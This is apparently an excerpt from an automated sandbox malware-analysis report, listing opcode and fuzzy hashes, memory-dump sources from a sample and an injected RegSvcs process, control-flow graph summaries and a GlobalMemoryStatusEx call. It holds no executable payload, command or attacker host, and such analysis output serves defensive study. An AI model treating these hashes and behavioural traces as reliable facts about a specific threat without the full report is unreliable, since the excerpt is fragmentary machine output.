                                                • Opcode ID: 8f6b3fc9b570eeba93c1f98545e75cf8045195f855ac94754ab33999460fba11
                                                • Instruction ID: d05c1da39314c25f0b9f698156ef69e3b12a746d05bd60aa67aa6cdfe2e5793a
                                                • Opcode Fuzzy Hash: 8f6b3fc9b570eeba93c1f98545e75cf8045195f855ac94754ab33999460fba11
                                                • Instruction Fuzzy Hash: 81E1D8B4E002198FDB14DFA9C580AAEBBF2FF89304F248269D455AB355D731AD42CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 138c125f5c16fcbd7c0fa0ed10e003875d4a6dd1bbfee2d6db8f50aeb32a9f22
                                                • Instruction ID: aba3ea7acb9056fee95b680c299c9b8f4b6fa6e82601dc92c74e6e69e53b4235
                                                • Opcode Fuzzy Hash: 138c125f5c16fcbd7c0fa0ed10e003875d4a6dd1bbfee2d6db8f50aeb32a9f22
                                                • Instruction Fuzzy Hash: 55E1C8B4E002198FDB14DFA9C580AAEBBF2FF89304F648269D415AB355D731AD42CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f255aa547eded16f1b946ede620d30edc309aa47c23fb8892f80d8ce9868bf6b
                                                • Instruction ID: 03f456a376b35c40f9af2813ea108a57a9fb2589657701f6a1e2c42c2a2a5d37
                                                • Opcode Fuzzy Hash: f255aa547eded16f1b946ede620d30edc309aa47c23fb8892f80d8ce9868bf6b
                                                • Instruction Fuzzy Hash: C4D1F835D20B5A8BCB11EF64D951A99B771FF96300F10C79AE04A77224EB70AAC4CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 500a64a1d32ce93f063e19f167454f57d54aafeda23fed162119ca40f0ddc88e
                                                • Instruction ID: d80d962d4316954316978fd343a7e5b434c0c77d825c3be2c83d54a74087d689
                                                • Opcode Fuzzy Hash: 500a64a1d32ce93f063e19f167454f57d54aafeda23fed162119ca40f0ddc88e
                                                • Instruction Fuzzy Hash: 7AA18432E00216CFCF19DFB8C8845DEBBB2FF85304B15856AE905AB265DB71E956CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 91aadb31849a5d49e45abcdbc6e8ca90e29ed0fa970c25787ce0dcb615b30022
                                                • Instruction ID: 0b9e827b4d3c7130c6c33046b0fe0ae189c3b3eca3fdf4b487f9ed880c20a119
                                                • Opcode Fuzzy Hash: 91aadb31849a5d49e45abcdbc6e8ca90e29ed0fa970c25787ce0dcb615b30022
                                                • Instruction Fuzzy Hash: D8D1F535D20B5A8BCB11EF64D951A99B771FF96300F10C79AE14A37224EB70AAC4CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 111c6d74965eb9a78481cf26e42752b7b3ddf68034f6ff6a9c5429956d34cc84
                                                • Instruction ID: 6926e10cdb906e99895685a24fe0f2d1cab3b07347a882ca5686d2b28410c484
                                                • Opcode Fuzzy Hash: 111c6d74965eb9a78481cf26e42752b7b3ddf68034f6ff6a9c5429956d34cc84
                                                • Instruction Fuzzy Hash: 1ED1F535D20B5A8BCB11EF64D951A99B771FF96300F10C79AE04A37225EB70AAC4CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9ed5b9636bc0da11d8925ed046008d19877dec605d8546d3bbd069ae4679a3a
                                                • Instruction ID: 52c4add20e949346f3d513fbf9d029912d8510eb364f32e09d0e3239a87f5609
                                                • Opcode Fuzzy Hash: f9ed5b9636bc0da11d8925ed046008d19877dec605d8546d3bbd069ae4679a3a
                                                • Instruction Fuzzy Hash: FD61EDB0A16709EBD740CF90E58915DBFB2FBC9300F25959AC489A7158DB388A64CB46
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25661db439c5159ac2622db40507b367fa51e707b737a351cb92c918a0b288a5
                                                • Instruction ID: 78c5cb54ebf157482e248e897f658ef905406638eafaa449ea4fc82f973cc38b
                                                • Opcode Fuzzy Hash: 25661db439c5159ac2622db40507b367fa51e707b737a351cb92c918a0b288a5
                                                • Instruction Fuzzy Hash: 846147B5E043499FCB05CFA9C8815EEFFB2BF46200F14C55AD469E7240D2349A82CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 96c726f149985d931646e4efcab7b044def39d9caeb6b0b545cd533592299163
                                                • Instruction ID: b064c745376de14792d96577dd965f2671b603a37b09e210bb7fdf0c3d836511
                                                • Opcode Fuzzy Hash: 96c726f149985d931646e4efcab7b044def39d9caeb6b0b545cd533592299163
                                                • Instruction Fuzzy Hash: 6261FEF0A1670EEBD740CF90F18915DBFB2FBC9300F21959AC499A7158DB388A60CB46
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c466c993049bb4e9e670210a1e08f92c962b6decb28ecdb66fab8a8d22efe6d6
                                                • Instruction ID: dd42bf08d6154ed1ed3bc20dfe402c8dd054c05e34b931c9f26e930766cb93ba
                                                • Opcode Fuzzy Hash: c466c993049bb4e9e670210a1e08f92c962b6decb28ecdb66fab8a8d22efe6d6
                                                • Instruction Fuzzy Hash: E561F4B4E1430AAFCB04DFA9C5815EEFBB6BF89300F14855AD529A7304D3749A818FA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 263609e8c2fa9f47cdc210d7547c1046c85dbc714a71f973d6aa99fe77c02ae1
                                                • Instruction ID: ee21247b80d9314a97f9f76ea4dc615fa73955b9de0f51b9fe69d4f849a74e6c
                                                • Opcode Fuzzy Hash: 263609e8c2fa9f47cdc210d7547c1046c85dbc714a71f973d6aa99fe77c02ae1
                                                • Instruction Fuzzy Hash: 6E5127B4E1531ADFCB04CFA6D4455AEFBF2BF8A310F10952AE411B7254E7385A428F94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6b2b475e52bdbe3c0254fa40b5384149edf6dedaad0c6eba67da41e473453e73
                                                • Instruction ID: a81dcef01ba07fa1891f0f3fdafc43f23473ed55a409b27009f526b52f427a7b
                                                • Opcode Fuzzy Hash: 6b2b475e52bdbe3c0254fa40b5384149edf6dedaad0c6eba67da41e473453e73
                                                • Instruction Fuzzy Hash: 9B5127B0E1531ADFCB08CFA6D4855AEFBF2FF89210F10912AE515B7254E7345A428F94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 34e81146212dc541f526e94769cb8b25097c51308e34074287655b07352d01a0
                                                • Instruction ID: ba739d9304df453e0fe8d6e336726229b2fe4108106048d08c6a261d3a6b6e44
                                                • Opcode Fuzzy Hash: 34e81146212dc541f526e94769cb8b25097c51308e34074287655b07352d01a0
                                                • Instruction Fuzzy Hash: CB51E9B4E042198FDB14CFA9C9406AEBBF6EF89304F248269D419AB355D7319D41CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e4e19035f661db95344da736ffd9c623d7fc5b96fe9b0c3508c082caf986a16
                                                • Instruction ID: 1fcc7f492a5f16c94a41625957be0bb373e2cba67f6d90d0ac4951af2900985d
                                                • Opcode Fuzzy Hash: 5e4e19035f661db95344da736ffd9c623d7fc5b96fe9b0c3508c082caf986a16
                                                • Instruction Fuzzy Hash: 474105B0E0130A9FCB44CFAAC4855AEFBF2BF89210F24C16AC529B7254D7749A418F54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e000b7502e6c08848a8a58971be6bcdb15b0e3ec4ce9cf2a3c502562403f689f
                                                • Instruction ID: 8056bf639ba550355dbabd9360a7b5b18e3ce239e646da7d386d77bd400a8b38
                                                • Opcode Fuzzy Hash: e000b7502e6c08848a8a58971be6bcdb15b0e3ec4ce9cf2a3c502562403f689f
                                                • Instruction Fuzzy Hash: A041D4B0E0030ADFDB44CFAAC4855AEFBF2BF89200F24D16AC519B7254D7749A418F54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:10.8%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:16
                                                Total number of Limit Nodes:3
                                                • Graph (rendered image not captured; raw edge list omitted): entry 1581390 -> 1587090 -> 669cf7f / 669cf90 -> GlobalMemoryStatusEx, called from 669d831 and 669d5d2
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4ab2db942673e352da0514393049586c12d6b548c55d4219ea187d1e42c39fb1
                                                • Instruction ID: f188df2f0d15d8e6043f59f3769d44560bb812a40b0c410a90ed07401b4bf3c6
                                                • Opcode Fuzzy Hash: 4ab2db942673e352da0514393049586c12d6b548c55d4219ea187d1e42c39fb1
                                                • Instruction Fuzzy Hash: DD63FB31D107198EDB11EF68C894AA9F7B1FF99300F15D69AE4587B121EB70AAC4CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 827462c3a2006a5e0439b6c8054552bf0755b6be07ae30ac0d8b35bbcc6890e3
                                                • Instruction ID: 2cb492b6e3c8b04cf882d9954d693471c4faba82252f8f83b012399f2426be18
                                                • Opcode Fuzzy Hash: 827462c3a2006a5e0439b6c8054552bf0755b6be07ae30ac0d8b35bbcc6890e3
                                                • Instruction Fuzzy Hash: DA331E31D107198EDB11EF68C8806ADF7B1FF99300F15C69AE459BB251EB70AAC5CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph
                                                • Function start: 1583e80 (rendered graph not captured; raw edge list omitted)
                                                • Calls: 1580ab8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \V}j
                                                • API String ID: 0-4284003065
                                                • Opcode ID: d810bf1a1c679555115b0ccdafd4ca97cbf58ec77e4d7cb906e5c5c1dc34c853
                                                • Instruction ID: e0f18173f873751ac1c4c73880008a08116d6b47195280f8746f3fefefeb688b
                                                • Opcode Fuzzy Hash: d810bf1a1c679555115b0ccdafd4ca97cbf58ec77e4d7cb906e5c5c1dc34c853
                                                • Instruction Fuzzy Hash: ED916E70E0020ADFDF10EFA9C98179EBBF2BF88714F148529E815BB254DB749846CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1b97152c3e266554000b71027977ad595cbadbd8e1d17badacd334b87eff8d16
                                                • Instruction ID: 40422d07ea2b97a08cb629dd536c84a66c3a180a20a54f57497e16bbf0fd7f9c
                                                • Opcode Fuzzy Hash: 1b97152c3e266554000b71027977ad595cbadbd8e1d17badacd334b87eff8d16
                                                • Instruction Fuzzy Hash: 20C1B030A002058FDB15EF69D8807AEBBB6FF89314F20856AD509EF395D774D841CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 588afa55f8ac2d6c5d2735342292d24a935111e43c5124cbf484bb4bd9423c71
                                                • Instruction ID: 523220e2d5a00e05785be23b16ecb87a5733bb66c23095b8d157065004dbf882
                                                • Opcode Fuzzy Hash: 588afa55f8ac2d6c5d2735342292d24a935111e43c5124cbf484bb4bd9423c71
                                                • Instruction Fuzzy Hash: 73B13D70E0021ACFEF10DFA9D8857ADBBF2BF88314F148529D815BB254EB749885CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph
                                                • Function start: 1584810 (rendered graph not captured; raw edge list omitted)
                                                • Calls: 1580ab8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \V}j$\V}j
                                                • API String ID: 0-799745403
                                                • Opcode ID: 530a23b90d2a5f590cd0901b22c19834763076d273324ab42ca990ccf98cdf57
                                                • Instruction ID: 10fdd8d12e7dc91c5715eb073942f2ccad63f08b9d071049e0998f73f71e7e53
                                                • Opcode Fuzzy Hash: 530a23b90d2a5f590cd0901b22c19834763076d273324ab42ca990ccf98cdf57
                                                • Instruction Fuzzy Hash: 55714B70E0024ADFDB10EFA9C88079EBBF2BF88714F148129E815BB254EB749845CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph
                                                • Function start: 1584804 (rendered graph not captured; raw edge list omitted)
                                                • Calls: 1580ab8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \V}j$\V}j
                                                • API String ID: 0-799745403
                                                • Opcode ID: c88ebcbacf758a1b1c862896cb70dbb46d8d6a4df769518b152605cd994bf2a6
                                                • Instruction ID: 47780b8161104595db0d8c3b3c0f7568742f45bd65dd624289bd7cd29bba70a5
                                                • Opcode Fuzzy Hash: c88ebcbacf758a1b1c862896cb70dbb46d8d6a4df769518b152605cd994bf2a6
                                                • Instruction Fuzzy Hash: 7B713870E0024ACFEB10EFA9D98179DBBF2BF48714F148529E815BB250EB749845CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph
                                                • Function start: 669e191 (rendered graph not captured; raw edge list omitted)
                                                • Calls: 669d578, 669d584, GlobalMemoryStatusEx
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1401938166.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_6690000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f36278e3122276fbfed82a7073f228fca10aec5333e7119a6934827b3b1cf94
                                                • Instruction ID: 8bb1c3a1e04b0cd88d54f1cf04d9a5bd83a5cd505e48e435508115a6f818fceb
                                                • Opcode Fuzzy Hash: 9f36278e3122276fbfed82a7073f228fca10aec5333e7119a6934827b3b1cf94
                                                • Instruction Fuzzy Hash: 6B412671D043A59FDB14CFA5D8406AEBBF5AF8A210F14856BD805A7281DB789841CBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph
                                                • Function start: 669e278 (rendered graph not captured; raw edge list omitted)
                                                • Calls: GlobalMemoryStatusEx
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE ref: 0669E2DF
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1401938166.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_6690000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: 2e80f3b137610c1c03d0fb3af0d059b92cdb9fc0dcb8d5cd4e3cd89c186e8cd4
                                                • Instruction ID: 40bf107dc0b7199db5af7ff12f56f770e3032fb8b7bb148c439cd38cdc0a3ed9
                                                • Opcode Fuzzy Hash: 2e80f3b137610c1c03d0fb3af0d059b92cdb9fc0dcb8d5cd4e3cd89c186e8cd4
                                                • Instruction Fuzzy Hash: 521123B1C0065A9BCB10CF9AC444BDEFBF4EF48324F14852AD818A7240D778A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph (interactive rendering and executed/not-executed colouring not reproduced; full edge list omitted)
                                                • Basic blocks 1583e76 through 1584180
                                                • Self-loops at 1583f11-1583f20, 1583fb7-1583fc6, 158401d-158402c and 1584180
                                                • Calls to 1580ab8 from 1584127-158412a, 158413b-158413e and 158414f-1584152
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \V}j
                                                • API String ID: 0-4284003065
                                                • Opcode ID: 43e7026fc06c94a69efe6fbd4cd5627fd5c30d12486d536dd105abce8e83f88f
                                                • Instruction ID: df1477325c38d9f8e2d61dec42d32bbb1ab46ccfd1eb7fdedcc506be70026835
                                                • Opcode Fuzzy Hash: 43e7026fc06c94a69efe6fbd4cd5627fd5c30d12486d536dd105abce8e83f88f
                                                • Instruction Fuzzy Hash: F6914D70E0024ADFDB10EFA8D9817DEBBF2BF48714F148529E815BB254DB789846CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph (interactive rendering and executed/not-executed colouring not reproduced; full edge list omitted)
                                                • Basic blocks 158f4b5 through 158f629; entry block 158f4c5-158f4cc branches to 158f4b5-158f4bc or 158f4ce-158f4f3
                                                • Loop 158f4f5-158f4f8 .. 158f524-158f527 (back edge 158f524-158f527 -> 158f4f5-158f4f8)
                                                • Loop 158f586-158f590 .. 158f5a8-158f5f9 (back edge 158f5a8-158f5f9 -> 158f586-158f590)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ]
                                                • API String ID: 0-3352871620
                                                • Opcode ID: 623b9f6eb96202d90a3928f5a6a51eb03431f4fbfb8503b57df35dc97fa09071
                                                • Instruction ID: debccc86e3b7467b9ba0fcecfc23d569932ba560244f60d2ca37719e0cb72899
                                                • Opcode Fuzzy Hash: 623b9f6eb96202d90a3928f5a6a51eb03431f4fbfb8503b57df35dc97fa09071
                                                • Instruction Fuzzy Hash: E541CE307002019FEB16AF38985476E3AE2BB89644F24456ED406EF395DF38CC42DBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1c23729ab3410584233cb81023ff8de73a5d21b427534e343e4df86057b5bec8
                                                • Instruction ID: 79d6a649ddec72b75fcfd438278b897f7373159e57ab3e659481925a599d4880
                                                • Opcode Fuzzy Hash: 1c23729ab3410584233cb81023ff8de73a5d21b427534e343e4df86057b5bec8
                                                • Instruction Fuzzy Hash: AA125D317002128BDB5AAE38E54062D72ABFBCE290B209939D506DF351DF7EDC468F91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 28647a3b2cc87a2e393e22bc305e677bc03764c320ea808ba51055948ccd432e
                                                • Instruction ID: 80992d4cb0bbdd3c91da6f4665a950f4affd7c95c96943c834b49d6aecc567c5
                                                • Opcode Fuzzy Hash: 28647a3b2cc87a2e393e22bc305e677bc03764c320ea808ba51055948ccd432e
                                                • Instruction Fuzzy Hash: 7AD17B34B002158FDB15EF68D894AAEBBB2FBC9314F248469E506EB391DB35DC41CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b3460af13c7aeb4e2caa7bfecb6e033b9c04f5210a56b31fb3c1910d05753514
                                                • Instruction ID: 5fd7a6cfe2b8543b05406442a51fd5e61a2e8c6879b5dcd6fb1c3b281d052e9a
                                                • Opcode Fuzzy Hash: b3460af13c7aeb4e2caa7bfecb6e033b9c04f5210a56b31fb3c1910d05753514
                                                • Instruction Fuzzy Hash: 28A13A70E0025ACFEF10EFA8D98579DBBF2BF48314F148529D815BB294EB749885CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 06b39ce42ba801c6ea3eef0ca53aaf65d8c4b28292cf837d5361fa1e1fc24ac7
                                                • Instruction ID: 0647d057628cc84c4730bad0b82d27e5a0d079ffdcfcfa18254b2bd405d72c08
                                                • Opcode Fuzzy Hash: 06b39ce42ba801c6ea3eef0ca53aaf65d8c4b28292cf837d5361fa1e1fc24ac7
                                                • Instruction Fuzzy Hash: 52419E35B00219DFDB15EB68D4507AEB7B6FF8A300F20852AE415FF291DB7598428B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ec22eb32c042a78dedab0c12ed291b0abb36ce921c0dde68621bef60cf287ff
                                                • Instruction ID: 74f0738a635ee4b86f0f0f156553bed9fda1e35a5a20b777a25d391c4ec22b9e
                                                • Opcode Fuzzy Hash: 3ec22eb32c042a78dedab0c12ed291b0abb36ce921c0dde68621bef60cf287ff
                                                • Instruction Fuzzy Hash: 49510375E002188FDB18DFA9C885B9EBBF1FF48314F14852AE815BB391DB74A844CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_1580000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72a52749702275b85d620260ed04447646772c7d2c499329f2af28055d975624
                                                • Instruction ID: fe406fb8eba96beb9717d95d9f985bb9955b774fffdb7d9e74018e6812aa9a85
                                                • Opcode Fuzzy Hash: 72a52749702275b85d620260ed04447646772c7d2c499329f2af28055d975624
                                                • Instruction Fuzzy Hash: 4E510374E002188FDB18DFA9C885B9EBBF1FF48314F54852AE815BB391D774A844CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.1394876678.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                Joe Sandbox IDA Plugin
